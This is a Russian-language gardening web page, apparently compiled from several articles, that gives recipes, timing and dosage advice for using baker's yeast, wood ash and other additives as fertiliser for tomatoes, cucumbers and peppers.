2 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Как сделать подкормку из дрожжей для помидоров и огурцов

Как сделать подкормку из дрожжей для помидоров и огурцов

Удобрять помидоры и огурцы подкормкой из дрожжей стало распространенным способом для многих садоводов. Такой вид удобрения активно применяют огородники, занимающиеся органическим земледелием. Дрожжи для подкормки помидоров и огурцов можно найти практически в любом магазине. Главное их преимущество заключается в том, что они не оказывают такого негативного влияния на растения, как химические препараты. Многие специализированные магазины, реализующие продукцию сельскохозяйственного назначения, зачастую продают подкормки с ядовитыми веществами.

Подкормка из дрожжей для помидоров и огурцов

Наряду с полезными веществами и минералами в составе таких продуктов будет содержаться ряд совершенно противоположных им веществ. При выращивании продуктов для домашнего использования вряд ли кому-то захочется употреблять овощи, выращенные с применением химикатов. Для себя и своих близких все хотят выращивать только полезную и экологически чистую продукцию. С учетом этих целей и появились подкормки на основе дрожжей, не содержащие вредных веществ. Дрожжами заменяют химические добавки, стимулирующие быстрый рост.

Применение дрожжей берет начало в давние времена. В период, когда еще не было магазинов, продающих химические добавки. С их появлением необходимость использовать традиционную подкормку отпала, так как химия давала гораздо более сильный эффект. В настоящее время современные садоводы предпочитают выращивать овощи с помощью подкормок из органического удобрения. Лучше всего дрожжевую подкормку воспринимают помидоры, огурцы и перцы.

Виды дрожжей

Многие готовят удобрение из дрожжей для помидоров и огурцов самостоятельно, так как сделать это легко и больших временных затрат не требуется. Для приготовления органического удобрения можно использовать разные виды дрожжей.

Дрожжи бывают нескольких видов:

  • быстродействующие;
  • свежие;
  • сухие;
  • гранулированные;
  • прессованные.

При отсутствии готовых дрожжей, делают аналогичное по действию питательное вещество в жидком виде. В качестве составных частей для раствора можно использовать сухари, хлеб или другие готовые продукты на мучной основе. Для усиления эффекта в качестве добавки к дрожжам используют растительные компоненты в виде настойки. Для этого пользуются сорняками, ботвой от овощей (например, от картофеля) или листвой какого-либо дерева.

Плюсы и минусы дрожжевой подкормки

Достаточно подкормить растения три раза за сезон

Существует много вариантов, как удобрить самые распространенные овощные культуры: перцы, томаты и огурцы. Главное — не перебарщивать, так как переизбыток удобрений вредит посадкам. Подкармливать рассаду чаще трех раз в сезон нет никакой необходимости.

Применение удобрения стимулирует растение к более активному питанию, поэтому оно начинает с каждым разом в процессе роста требовать все больше питательных веществ. Это приводит к обеднению почвы.

Еще один негативный момент использования подкормки в виде дрожжевой смеси — это увеличение содержания азота в растении. Он будет способствовать бурному росту зеленой части, в то время как плоды расти не будут.

Распространенные рецепты дрожжевых подкормок

  • Рецепт 1. 3 ч. л. дрожжей, 2 ст. л. сахарного песка и 10 л воды чуть теплее комнатной температуры смешивают и ставят настаиваться на 3 часа. Полученную смесь разводят небольшим количеством воды (соотношение 1:5).
  • Рецепт 2. В этом рецепте используются свежие дрожжи. Компоненты: 100 г дрожжей, вода. Сначала дрожжи заливают водой (0,5 л), перемешивают до полного растворения, доливают воду в большом количестве (оптимально — 5 л). Особенно эффективной будет добавка для томатов и цветов.
  • Рецепт 3. Для этого варианта потребуются свежие дрожжи (100 г), теплая вода (10 л), 0,5 кг золы (эффективной будет только древесная). Рецепт приготовления прост: ингредиенты необходимо просто смешать. Применять подкормку лучше всего во время время наиболее активного роста овощей.
  • Рецепт 4. Наиболее распространено применение этого рецепта на больших участках, где произрастают помидоры и огурцы. В состав входит зелень (примерно ведро в измельченном виде), 500 г дрожжей (как и в нескольких предыдущих рецептах, лучше использовать свежие), 70 л воды. Все перечисленные компоненты нужно перемешать и дать настояться 24 часа, чтобы смесь забродила. Использовать раствор нужно одновременно с поливкой, поэтому поливать посадки лучше всего после захода солнца.

Дрожжевая подкормка с золой

Хорошим средством, уменьшающим содержание азота за счет богатого содержания минералов является древесная зола. Использование золы вместе с дрожжевым раствором особенно эффективно для выращивания огурцов и помидоров, так как не позволяет зелени разрастаться. Наиболее богата минералами зола, образующаяся в результате горения дров из фруктовых растений. Наименьшее содержание минералов — в старых иссохших поленьях.

Золу необходимо использовать правильно: разводить теплой водой и смешивать с дрожжевым удобрением.

Дрожжевая подкормка с золой действительно необходима растениям. После попадания в почву дрожжи обогащают ее полезными веществами, такими как витамины, фитогормоны и ауксины.

Все это способствует увеличению скорости деления и дифференцировки клеток, а также увеличению активности микроорганизмов. Начинают активно действовать угольная кислота, молекулы фосфора и азота. Таким образом почва получает практически полный комплекс минеральных веществ, столь необходимых растению.

Наиболее оптимально подкармливать почву в весенний период, когда уже тепло: в холодных условиях дрожжи не подействуют. Если урожай не торопится появляться или само растение вялое, следует проводить повторную подкормку.

Правила проведения подкормки

Впервые огурцы или помидоры подкармливают примерно через 7 дней после высадки, землю перед этим обогащают азотом. Удобрять раньше этого срока не имеет смысла, так как растение еще не укоренилось и не может воспринимать добавку.

При повторном внесении почву обогащают фосфором, а подкормку вносят до цветения в целях увеличения завязей. При этом используемый второй раз рецепт не должен отличаться от первого, изменяют только объем. Если впервые применяют примерно 0,5 л удобрений, во второй раз количество увеличивается в 4 раза. Для подкормки выбирают теплый день.

Растение можно подкормить и в третий раз, после первого сбора урожая.

Для получения хорошего урожая следует соблюдать рекомендации

Удобрение сверх меры ни к чему хорошему не приводит. Это относится и к количеству подкормок, и к объему раствора, вносимого за один раз. Рекомендуется использовать более разбавленное средство, так как это уменьшает риск повреждения посадок из-за высокой концентрации. Аналогичный эффект можно получить, воспользовавшись сухарями черного хлеба. Их целесообразно использовать вместе с дрожжами или вместо них.

Наиболее оптимальный рецепт подкормки для томатов и огурцов — 10 г дрожжей смешать с 500 г золы и 500 г помета, добавить 10 л воды и 5 ст. л. сахарного песка. Использовать эту смесь следует, разбавляя в соотношении 1:10, вливая смесь не под корневую систему или на огурцы, а вокруг посадок.

Как лучше подкармливать дрожжами помидоры, огурцы и перцы

Огородникам всё тяжелее получить на своих участках хороший урожай. Различные заболевания, неблагоприятные погодные условия, обеднённая почва, отсутствие севооборота приводит к тому, что дачникам приходится прибегать к использованию большого количества агрохимических препаратов. Некоторые любители – овощеводы даже не догадываются, что многие удобрения можно заменить природными веществами. Один из таких природных стимуляторов – дрожжи. Они не менее эффективны, чем химические препараты. Наиболее известна дрожжевая подкормка для огурцов.

Польза дрожжевой подкормки

Большое преимущество дрожжевой подкормки – её экологичность. Выращенные с использованием этих грибов растения не накапливают в себе вредные вещества. Можно применять в любое время – как в период рассады, так и во время плодоношения. Они содержат большое количество микроэлементов, необходимых для растений. Обогащают почву необходимыми веществами, улучшают микрофлору грунта.

Минусы – способны закислять почву, вымывая из неё кальций, калий. Без этих элементов невозможно добиться хорошего плодоношения. Решение проблемы – необходимо перед использованием удобрения посыпать поверхность почвы древесной золой.

Видео: Как сделать подкормку для овощей на дрожжевой основе

Дрожжевая подкормка для огурцов и помидоров имеет следующее действие:

  • стимулирует рост вегетативной части овощей – листьев, стебля, корней;
  • повышает защитные силы;
  • увеличивает урожайность.

По действию её можно сравнить с комплексными минеральными удобрениями. В ней содержатся:

Как и когда использовать дрожжевую подкормку

Подкормку огурцов производят не чаще, чем 1 раз в 1,5 недели, для помидоров – 1 раз в 2 недели. Если есть необходимость в таком частом использовании дрожжей процесс должен сопровождаться параллельным внесением в почву древесной золы или яичной скорлупы.

В качестве удобрения используют сухие или свежие хлебопекарские дрожжи. Свежие — считаются более эффективными. Разводить их следует только в тёплой воде. Использование горячей, холодной воды не допустимо. Во время использования сухих дрожжей добавляют сахар. Это необходимо для брожения.

Полезно вносить такую подкормку 4 раза:

  • в период рассады:
  • после пересадки на постоянное место;
  • во время цветения;
  • в период плодоношения.

Её можно использовать в любое время. Излишне частое применение может привести к бурному росту вегетативной части, что приведёт к скудному урожаю. В отдельных случаях растения могут даже погибнуть. Оптимальное число подкормок – 3 раза за весь сезон.

Они стимулируют рост, плодоношение многих культур. Но лучше всего влияют на помидоры, огурцы, перцы. Нельзя вносить питательную смесь в холодный грунт. Для активации брожения земля должна прогреться. Дрожжи должны быть с большим сроком годности. Перед внесением удобрения землю требуется увлажнить. Следует применять их отдельно от органических удобрений.

В рецептах с добавлением молока требуется использовать только свежее, не кипячёное молоко. Пастеризованное пакетированное молоко не подходит. Если в рецепте предусмотрено брожение раствора, то такую подкормку лучше применять для взрослых кустов. Для рассады необходим свежеприготовленный раствор.

Подкормка огурцов дрожжами

Можно ли подкормить овощи: томаты, огурцы, перцы, — дрожжами во время плодоношения? Да, можно. Они совершенно безопасны.

Такой питательной смесью огурцы удобряют до 3-х раз:

  • после появления 2-х настоящих листов;
  • во время цветения;
  • после волны активного плодоношения.

Рассаду огурцов следует подкормить дрожжами сразу после пересадки в открытый грунт.

Дрожжевая подкормка для огурцов в теплице лучше всего действует после посадки на постоянное место роста. В закрытом грунте её применяют только через несколько недель после посадки.

Как поливать огурцы дрожжами

Такое удобрение применяют как под корень, так и для опрыскивания листьев – внекорневая подкормка.

Рецепты:

  1. 200 г свежих дрожжей помещают в десятилитровый сосуд. Заливают 1 литром тёплой отстоявшейся воды. Ёмкость закрывают. Оставляют на 3 часа для брожения. Доливают сосуд жидкостью до краев. Этого объёма раствора хватит для 10 растений.
  2. 100 г дрожжей разводят в небольшом количестве воды. Добавляют половину стакана сахара, 2,5 литра жидкости. Ставят в тёплое помещение. Для удобрения 200 мл полученной опары разбавляют в ведре воды. Одному кустику необходимо 1 литр удобрения. Для рассады следует применять ¼ — 250 мл.
  3. 10 г дрожжей разводят в трёхлитровом сосуде. Засыпают сахар. Держат 1 неделю. Для полива под корень стакан опары разводят в 10 литрах жидкости. Можно использовать для опрыскивания листьев.
  4. В ведре воды разводят 1 пачку сухих дрожжей. Добавляют ¼ стакана сахара. Ставят в тёплое место на несколько часов. Для полива овощей получившееся удобрение заливают 5 вёдрами жидкости.

Такие полезные смеси помогают избежать большого числа пустых цветов, влияют на качество огурцов. Сокращается число пустотелых плодов.

Удобрение томатов дрожжами

Подкормку из дрожжей можно сделать как для огурцов, так и для томатов, перцев. Эти грибы влияют не только на рост и количество урожая помидоров, но и на их вкус. Такое удобрение даёт возможность получить более сладкие плоды. Можно воспользоваться следующим рецептом. Берут десятилитровое ведро с водой. Добавляют 1 пачку сухих дрожжей, 500 мл древесной золы, чуть меньше ½ стакана сахара. Поливать под кусты следует через 15 минут, разбавляя её в 10 литрах жидкости.

Видео: Как готовить дрожжевую подкормку для помидор

Ещё один, более известный рецепт. В пятилитровом сосуде разводят 1 кг спиртовых дрожжей. Для полива в раствор следует добавить ещё 5 вёдер жидкости. Для одного зрелого куста требуется 2 литра удобрения. Для рассады – 500 мл.

Существуют рецепты, где для брожения применяют не одноклеточные грибы, а хмель. В поллитра кипятка помещают 200 г шишек хмеля. Ставят на плиту томиться около часа. После остывания добавляют 40 г сахара, 80 г муки. Смесь должна забродить. Выдерживают не менее 24 часов. Затем кладут 2 измельчённые картошки. Поливают овощи, разбавляя в пропорции 1:10.

Когда нужно использовать удобрение из дрожжей для томатов

Первый раз это рекомендуется делать после пересадки томатов – пикировки. Второй – в начале цветения, или после пересадки на постоянное место. Оптимальное количество – 2 – 3 раза за сезон.

Перед тем, как кусты начнут цвести, плодоносить, можно произвести опрыскивание. Это поможет защитить их от различных заболеваний. Для этого 100 г дрожжей растворяют в одном литре сыворотки, молока. Дают время для брожения. После этого добавляют 9 литров воды, 30 капель йода.

Подкормка перцев дрожжами

Для перца её используют во время пересадки рассады (через 2 – 3 дня) в незащищённый грунт, перед цветением. Оптимальное число поливов – 2 раза.

Можно использовать для замачивания семян. Готовят 10%-й раствор. Добавляют чайную ложку золы. Замачивают семена на несколько часов. Споласкивают чистой водой. В составе некоторых рецептов кроме грибов присутствуют и другие ингредиенты, такие как хлеб, трава, аскорбиновая кислота и т.д.

Рецепты:

  1. Нужно взять половину ведра воды. Добавить 10 -12 г сухих дрожжей, немного земли, 40 г сахара, 2 г аскорбининовой кислоты. Выдерживают 24 часа. Пропорции для полива — 1:10.
  2. Берут пятидесятилитровый бачок. Помещают в него 1 ведро срезанной травы, 450 г хлеба, 0,5 кг дрожжей, половину ведра жидкости. Оставляют бродить на несколько дней.
  3. В ёмкости смешивают 1/3 стакана сахара, по 2 стакана птичьего помёта, золы, 100 г дрожжей. Время брожения – 2 дня.

Дрожжевая подкормка для огурцов, томатов, перцев стимулирует их рост. Даёт возможность получить красивые, вкусные, полезные овощи. Одноклеточные грибы насыщают почву фосфором, азотом. Но большое количество внесённых в почву грибов вымывают кальций, калий. Что приводит к росту зелени, торможению образования плодов. Помните об этом.

Понравилась статья? Поделись с друзьями:

Здравия, дорогие читатели! Я — создатель проекта «Удобрения.NET». Рад видеть каждого из вас на его страницах. Надеюсь, информация из статьи была полезна. Всегда открыт для общения — замечания, предложения, что ещё хотите видеть на сайте, и даже критику, можно написать мне ВКонтакте, Instagram или Facebook (круглые иконки ниже). Всем мира и счастья! 🙂

Вам также будет интересно почитать:

Действенная дрожжевая подкормка для огурца и помидоров

Подкормка растений дрожжами — один из самых популярных способов поддержания культурных посадок у огородников. Это не только доступное по стоимости удобрение, но и очень эффективное. Примечательно, что дрожжи используются не для подкормки самих растений, а для активации развития бактерий, которые находятся в почве. В их составе содержится белок, который помогает размножаться почвенным микроорганизмам. Если в теплице или открытом грунте используется подкормка дрожжами, помидоры и огурцы приносят хороший урожай, растения выглядят здоровыми и сильными.

Полезные свойства дрожжей для растений

Процедура подкормки заключается в следующем:

  • дрожжи разводят по любому из подходящих рецептов;
  • полученным раствором в теплое время поливают растение;
  • под воздействием солнечных лучей дрожжевые микроорганизмы начинают развиваться, они выделяют азот, витамины группы В, перерабатывают органику;
  • растения начинают получать большое количество питательных веществ, у них усиливается рост и повышается иммунитет.

Важно! Дрожжи можно использовать только как водный раствор, а не концентрированный.

Правила использования дрожжевой подкормки

Дрожжи — это универсальное средство для стимуляции роста помидоров и огурцов. Основная их функция — общеукрепляющая. Использовать средство нужно только тогда, когда рассада уже полностью укоренилась и прижилась.

Перед формированием соцветий производится повторное внесение подкормки. Для одного молодого куста необходимо пол литра смеси. На подкормку взрослых томатов требуется два литра средства. Уже через несколько дней после процедуры растение становится живым, прибавляет в росте, появляются свежие листочки.

Часто огородники используют дрожжевую подкормку для восстановления ослабленных растений. С целью укрепления иммунитета готовится смесь из пяти литров воды и килограмма дрожжей. Перед использованием смесь разводят еще раз. На одну часть раствора нужно добавить 10 частей воды. Если для подкормки используются сухие дрожжи, необходимо 10 г перемешать с двумя столовыми ложками сахарного песка. Все компоненты растворяются в десяти литрах воды, подкормка разбавляется из расчета 1:5.

Отлично подходит дрожжевой раствор как подкормка для привлечения опылителей. Раствор притягивает пчел, благодаря этому ускоряется формирование завязей. Процедура проводится до начала цветения. Обязательно в раствор должен добавляться сахар. Обработку нужно проводить только в сухую и теплую погоду утром или вечером.

В теплице

Огурцы, которые выращиваются в теплице, нужно удобрять по два-три раза за сезон. Не стоит злоупотреблять частотой, так как это приведет к нарушению бактериального баланса в почве.

Первая прикормка производиться примерно через неделю после высадки рассады в теплицу. Корни за этот период успевают укрепиться. Они уже становятся готовы принимать питательные элементы из почвы. Сначала огурцы обогащают азотными удобрениями, а затем вносятся дрожжи. Перед подкормкой почву нужно тщательно увлажнить.

Через месяц после высадки рассады, как только появились первые плоды, можно полить растение второй раз. Как раз в этот период оно очень нуждается в большом количестве питательных веществ.

Для справки! Если в теплице посажены огурцы с длительным сроком плодоношения, может потребоваться третья подкормка. Она проводится в августе.

В открытом грунте

Чтобы дрожжи приносили пользу, оставались максимальный период времени активными, положительно действовали на микрофлору почвы, нужно соблюдать определенные правила их внесения в грунт. Они заключаются в следующем:

  • Почва должна быть теплой. При температуре ниже +12 градусов дрожжевые грибки не будут работать, они будут малоактивными.
  • Для того, чтобы грибки лучше размножались, в воду рекомендуется добавить сахар или варенье.
  • В раствор из дрожжей не примешивают другие компоненты, такие как навоз, помет. Этими веществами подкармливают растения за несколько дней до обработки дрожжами. Подкормку можно совмещать только с использованием древесной золы и мела, а также с настоем трав.
  • На каждый куст нужно использовать не более 1,5 литра раствора. Смесь выливается под корень. Можно опрыскивать растения, но раствор должен быть слабой концентрации.

Дрожжевые грибки после внесения их в почву будут действовать еще долгое время. Чтобы микроорганизмы сохраняли свою жизнеспособность, огурцы нужно поливать только теплой водой. Нельзя допускать пересыхания грунта. Благоприятный климат для развития бактерий можно создать с помощью слоя мульчи. Его делают из опавшей сухой листы, травы, соломы и опилок.

Способы приготовления дрожжевого раствора

Способ приготовления раствора для обработки зависит от вида дрожжей. Важно, чтобы в процессе соблюдались следующие условия:

  • была обеспечена теплая среда;
  • предоставлено питание для дрожжевых грибков;
  • выдержано время для активации микроорганизмов.

Из сухих дрожжей удобрение готовят по следующему рецепту:

  • упаковку 10 г разводят 10 литрами воды;
  • добавляется сахарный песок.

Важно! Перебродившую смесь никогда в чистом виде не используются. Для каждого рецепта есть свои пропорции для разведения его водой перед обработкой.

Брикеты в сыром виде разводят по следующей схеме:

  • 3,5 литра на 10 г дрожжей, вода должна быть 38-39 градусов, дрожжи крошат и разводят с водой;
  • добавляется сахар;
  • настой убирается в темное место на несколько часов.

Перед применением дрожжевую подкормку разводят водой в соответствии с рецептом.

Для помидоров

Дрожжевое удобрение дает хорошие результаты на развитие томатов как при пересадке, так и перед плодоношением. Для взрослых кустов применяется следующий рецепт:

  • в 10 литрах теплой воды разводится маленькая пачка сухих дрожжей;
  • после их полного растворения добавляется пол килограмма древесной золы и 100 г сахара;
  • раствор оставляют в телом месте;
  • как только он перебродит, его растворяют водой из расчета 1 к 10.

Томаты поливают перед цветением по 500 мл под корень. Это поможет увеличить урожайность.

Для огурцов

Наиболее полезна дрожжевая подкормка для огурцов. Раствор можно приготовить самостоятельно в домашних условиях. Для рецепта потребуются сухие дрожжи 100 г и 10 литров воды. Все перемешивается и настаивается полтора дня. Поливать кусты нужно под корни, на одно растение потребуется 1,5 литра.

Схема подкормки состоит из двух этапов:

  • Первый проводится в весеннее время, на шестой день после высадки рассады. Предварительно в почву должны быть внесены азотные удобрения.
  • Второй этап включает в себя внесение подкормки после того, как огурцы отцвели.

Перед вторым удобрением почву нужно удобрить фосфатными элементами.

Достоинства и недостатки дрожжевых подкормок

Свою популярность дрожжевая подкормка заслужила широким рядом достоинств. Они обусловлены природным происхождением дрожжей, их высокой степенью усваиваемости, а также отсутствием побочных явлений. Такая подкормка представляет собой готовый комплекс витаминов и микроэлементов, которые необходимы огурцам и помидорам.

В составе дрожжевых грибов содержится:

Никакие дополнительные минеральные комплексы вносить не потребуется. Достаточно только приготовить раствор по любому рецепту и оставить его настояться в теплом месте, чтобы произошла активация.

Главная особенность подкормки заключается в ее универсальности. Она отлично подходит как для огурцов, так и для томатов с перцами. Все полезные вещества сразу же впитываются корневой системой из грунта после обработки.

Для справки! Еще одни большим преимуществом является низкая цена. Дрожжи стоят дешево по сравнению с комплексными минеральными удобрениями.

У подкормки дрожжами огурцов и помидоров есть и ряд недостатков:

  • смесь нельзя хранить, ее нужно использовать сразу после приготовления. Это связано с тем, что дрожжи биологически активный материал. Они очень быстро теряют свои свойства;
  • из грунта, удобряемого дрожжевой смесью, вымывается калий. Его нужно компенсировать. Для этого хорошо подходит древесная зола;
  • не подходит такой способ удобрения в холодное время года, дрожжи не смогут активироваться;
  • не всегда такой вид подкормки приносит желаемый результат. Дрожжи ускоряют метаболизм, помогают активно развиваться имеющимся в почве элементам. Если в земле недостаточно удобрений, эффект подкормка не принесет.

Не стоит злоупотреблять процедурой. Слишком частая обработка только навредит растению.

Зная способы, как подкормить огурцы дрожжами, огородники получат хороший урожай без особых хлопот. Обогащенные питательными элементами растения будут активно и правильно развиваться, радуя большим количество плодов.

Дрожжи для подкормки помидоров и огурцов: эффективные рецепты + советы

Дрожжевая подкормка для огурцов и помидоров эффективно воздействует на развитие растений. Удобрение кустов во время цветения и в начале плодоношения повышает урожайность культур и улучшает вкус плодов. Подкормку огурцов и помидоров дрожжами проводят в теплицах и в открытом грунте.

Полезные свойства дрожжевой подкормки

В основе действия известного кулинарного продукта, естественного биологического вещества, деятельность дрожжевых грибков, которую используют для повышения урожайности овощных культур, особенно огурцов и помидоров. Впервые технология была разработана в семидесятых годах прошлого столетия. Дрожжевые грибки, попадая в почву, активизируют жизнедеятельность микроорганизмов, которые перерабатывают органику. Вследствие чего питательные вещества, необходимые растениям, переходят в легкоусвояемые формы, быстрее поступают к отросткам корней огурцов и томатов. После дрожжевых подкормок в почве ускоряются процессы синтеза азота и фосфора. Но одновременно грунт обедняется на кальций и калий, которые микроорганизмы активно используют для своей деятельности. При дрожжевых поддержках параллельно восполняют быстро расходуемые элементы подкормкой древесной золой или калийными препаратами.

Из-за такой особенности отличного удобрения для помидоров и огурцов подкормку дрожжами на одном и том же участке проводят не больше 3 раз в течение теплого сезона. Также следуют рекомендациям по количеству дрожжевой массы, чтобы не превысить дозу активных веществ и не создать дисбаланс минералов на грядке.

Дрожжевая подкормка экологически чистая и безопасная для огурцов и помидоров при соблюдении указанных норм. Деятельность дрожжевых микроорганизмов структурирует почву, активизирует микрофлору на участке. В то же время было замечено, что снижается количество патогенных бактерий. В дрожжевом удобрении много микроэлементов, полезных витаминов и аминокислот для растений. Очевидное достоинство подкормки в том, что минералы переходят в форму, легко усваиваемую огурцами и помидорами.

Применяя дрожжевые подкормки, соблюдают некоторые нюансы:

  • Удобряют огурцы и помидоры только при температуре выше 20 °С, потому что при более низких показателях деятельность одноклеточных дрожжевых грибков приостанавливается.
  • Одновременно на участок вносят древесную золу для восполнения калия и кальция.
  • Приобретая дрожжи для подкормки огурцов и помидоров, обращают внимание на срок годности, ведь в устаревшем продукте грибки погибают.

Как действуют дрожжи на огурцы и помидоры

Разнообразные составляющие дрожжевого удобрения положительно влияют на овощные культуры. Структурные изменения в грунте на уровне деятельности микроорганизмов позволяют корням активнее впитывать азот и микроэлементы. Дрожжи, как удобрение для огурцов и помидоров, способствуют:

  • укреплению корневой системы, стеблей;
  • ускорению роста листьев и цветочных кистей;
  • профилактике от некоторых болезней;
  • повышению урожайности;
  • гармоничному развитию куста, что гарантирует раскрытие всех сортовых признаков, в том числе вкуса плодов.

Уже спустя неделю куст огурцов или помидоров становится значительно пышнее, отмечается насыщенная зеленая окраска листьев и стеблей. Так же эффективно воздействие дрожжевой подкормки на рассаду:

  • растения укрепляются;
  • бурно развиваются, несмотря на недостаток освещения в теплице;
  • лучше приживаются после пересадки;
  • саженцы помидоров и огурцов становятся более устойчивыми к погодным условиям.

Сроки внесения подкормки

Культуры удобряют на любом этапе роста, но не чаще 3 раз за вегетацию. Особенно результативна подкормка из дрожжей для томатов и огурцов для акклиматизации:

  • после пересадки, в период адаптации к новой температуре и освещению;
  • в условиях внезапного, резкого понижения температуры при длительных дождях.

Дрожжевая поддержка может и навредить огурцам и помидорам, если применить ее на следующий день после пересадки. Подкормку проводят спустя неделю после перемещения рассады. Не используют дрожжевое удобрение и в холодную погоду, а только с потеплением, когда воздух прогреется свыше 20 °С, до показателей, комфортных для размножения и жизнедеятельности дрожжевых грибков.

Приблизительные сроки применения дрожжевого удобрения:

  • ослабленную по любым причинам рассаду помидоров и огурцов подкармливают после развития 3 листьев;
  • в фазе цветения и формирования завязей;
  • огурцы – после сбора первого урожая.

Как приготовить удобрение

Дрожжевую подкормку готовят всегда на теплой воде, с температурой от 30 до 40 °C.

Из сухих дрожжей

Продукт не требует холодильника для хранения, удобен для дачников:

  • обычно берут 10 г сухих дрожжей и разводят в литре теплой воды, температурой до 40 °C;
  • для брожения добавляют 50-100 г сахара и оставляют на 2-4 часа в тепле;
  • разводят в 9-10 л тоже теплой воды, температурой 25-28 °C;
  • затем полученный объем разбавляют 50 л нагретой на солнце воды и поливают огурцы и помидоры.

Из живых дрожжей

Свежий продукт разводят теплой водой, можно без сахара. Качественные дрожжи быстро растворяются:

  • 100 г дрожжей кладут в литр теплой воды;
  • растворяют 50-100 г сахара или обходятся без добавки, ставят на солнце для брожения, прикрыв емкость тканью;
  • через 3 часа состав разводят 9 л теплой воды и подливают по 500 мл под каждый куст.

Если площадь под помидорами и огурцами большая, готовят дрожжевой состав объемом 50 л:

  • разминают брикет свежих дрожжей с хорошим сроком годности весом 1 кг;
  • массу разводят в 5 л теплой воды;
  • после брожения, спустя 6-12 часов, раствор разбавляют в соотношении 1:10 и поливают грядки.

Как подкормить огурцы и помидоры дрожжами

Овощные культуры хорошо воспринимают удобрение из дрожжей в любой стадии развития, если выполнены такие основные условия:

  • почва под огурцами богата органикой изначально, после осенних удобрений, или насыщена весенними подкормками из растворов коровяка, птичьего помета или травяного настоя;
  • растения акклиматизировались после пересадки и выглядят здоровыми;
  • дрожжевую подкормку для томатов и огурцов вносят по мокрой почве – после дождя или полива;
  • спустя 5-7 дней на участке восполняют использованные микроорганизмами кальций и калий внесением калийного удобрения или раствора древесной золы.

В открытом грунте

На огороде дрожжевую поддержку осуществляют через 7-10 суток после посадки. Выбирают теплый день, когда и вечером температура не опускается ниже 20 °C.По мокрой почве под каждый корень огурцов или помидоров подливают по 0,5-1 л подкормки, согласно рецепту. Полив огурцов дрожжевым удобрением после сбора первой волны урожая произведет на куст омолаживающий эффект и стимулирует образование новых завязей. Вносят удобрение аккуратно, не разбрызгивая на листья и стебли. Особенно чувствительны листья огурцов, которые могут заболеть.

В теплице

Любые подкормки важны в закрытом помещении для обогащения почвы минералами и витаминами. Разнообразный состав дрожжевого удобрения пойдет на пользу культурам, которые там выращиваются. Огородники подметили, что правильно подкормленные дрожжами томаты легче переносят недостаток солнечного освещения и перестают вытягиваться вверх, а развивают куст, готовясь к плодоношению.

Соответственно специфике действия средства с живыми микроорганизмами, перед посадкой почву в теплице удобряют перегноем или компостом. Если огородники не хотят вносить натуральную органику, которая часто загрязняет почву семенами сорняков, возбудителями заболеваний и вредителями, стоит воспользоваться комплексными препаратами. Органоминеральные удобрения или переработанный куриный помет значительно обогатят почву. А дрожжевые грибки в теплую погоду активизируют деятельность бактерий по переработке азотистых соединений. Важно также восполнить возможный дефицит калия в почве теплицы, удобрив грядки с огурцами и помидорами раствором древесной золы с последующим поливом.

Заключение

Дрожжевая подкормка для огурцов и помидоров эффективна и быстро показывает результат. В то же время требует от огородника знаний относительно особенностей удобрений и грамотных действий. Только правильно построенный алгоритм работ принесет богатый урожай.

Дрожжи — эффективная подкормка для томатов и огурцов

Овощи из собственного огорода намного вкуснее и полезнее приобретённых в магазине, особенно если они выращены без применения химикатов. Среди органических удобрений особой популярностью у дачников пользуются пекарские дрожжи. Они стимулируют рост растений и защищают от болезней.

Когда и зачем нужно подкармливать помидоры и огурцы дрожжами

Дрожжи богаты белками, содержащими аминокислоты, витамины В, РР, D, макро- и микроэлементы. Дрожжевые грибки, попадая в почву, подавляют болезнетворные бактерии и активизируют полезные микроорганизмы, создавая для них благоприятную среду. В результате ускоряется процесс разложения органики и улучшается усвоение растениями питательных веществ, необходимых для их роста и плодоношения.

Дрожжи улучшают почвенную микрофлору и ускоряют обменные процессы в растениях

Благотворное влияние дрожжей на растения

Такая добавка полезна на всех этапах развития, но особенно необходима она для рассады. Дрожжи, улучшая кислородный обмен и подпитывая молодые ростки, способствуют интенсивному наращиванию зелёной массы и формированию развитой корневой системы. После такой подкормки рассада легче переносит пикировку и быстрее приживается при пересадке в грунт или теплицу.

При подкормке дрожжами рассада не вытягивается и вырастает более крепкая

Внесение дрожжевого раствора благотворно сказывается и на взрослых растениях:

  • Ускоряются процессы роста, сокращается период вегетации.
  • Повышается устойчивость к неблагоприятным погодным условиям.
  • Укрепляется иммунитет, создаётся защита от болезней.
  • Усиливается цветение и формирование завязей.

Подкормка дрожжами огурцов перед цветением стимулирует образование большего количества завязей

Видео: всё растёт как на дрожжах

Оптимальное время для дрожжевания

Используют дрожжи не более 3 раз за сезон, строго соблюдая рецептуру. Первая такая подкорка, проведённая через 10 дней после пикировки, даст возможность рассаде восстановиться и окрепнуть после стресса, а также интенсивно нарастить зелёную массу.

Второй раз подкармливают овощные культуры спустя 1–2 недели после высадки в открытый грунт или теплицу. Применение удобрения позволяет увеличить биологические силы растений, что способствует быстрой адаптации к новым жизненным условиям. Кроме того, дрожжи, замедляя развитие грибковых инфекций, защищают томаты от фитофторы, а огурцы — от серой гнили.

Через 1–2 недели высаженную в грунт рассаду необходимо подкормить дрожжевым раствором

Последнюю дрожжевую подкормку проводят в период появления бутонов. В результате происходит более массовое цветение и обильное плодоношение. У огурцов уменьшается количество пустоцветов, нет пустотелых плодов.

Применение такого удобрения особенно эффективно при отставании растений в развитии, при первых признаках болезней, а также для продления периода плодоношения и увеличения продуктивности.

Пожелтение листьев — признак нехватки питания, помидоры следует подкормить

При использовании дрожжевого раствора следует учитывать, что:

  • Дрожжевые грибы проявляют активность только в тёплой среде. Поэтому питательную жидкость вносят лишь в прогретую до +18–20°С почву.
  • В процессе брожения происходит поглощение калия и кальция, для восполнения этих элементов дрожжевое удобрение дополняют древесной золой (200 гм 2 ) или измельчённой в порошок яичной скорлупой (50 гм 2 ).

Внесение золы способствует насыщению почвы калием и кальцием

Как приготовить удобрение из дрожжей

Дрожжевую закваску готовят из сухих или свежих дрожжей, для большей эффективности можно внести дополнительные компоненты. Растворяют дрожжи только в тёплой (+20–26°C) воде.

Дрожжевую закваску готовят из сухих и свежих дрожжей

Рецепты дрожжевой подкормки

  • Свежие дрожжи (1 кг) разбалтывают в 5 л воды и оставляют на 1 час. Дрожжевую закваску перед поливом разводят водой (1:10).

Свежие дрожжи разводят в тёплой воде и настаивают час

Раствор, приготовленный из дрожжей и молока, не только питает растения, но и защищает от болезней

Травяной настой с добавлением дрожжей — очень эффективное комплексное удобрение

Сухие дрожжи начинают работать быстрее, если добавить сахар

Аскорбиновая кислота участвует в обменных процессах растений и обладает восстановительными свойствами

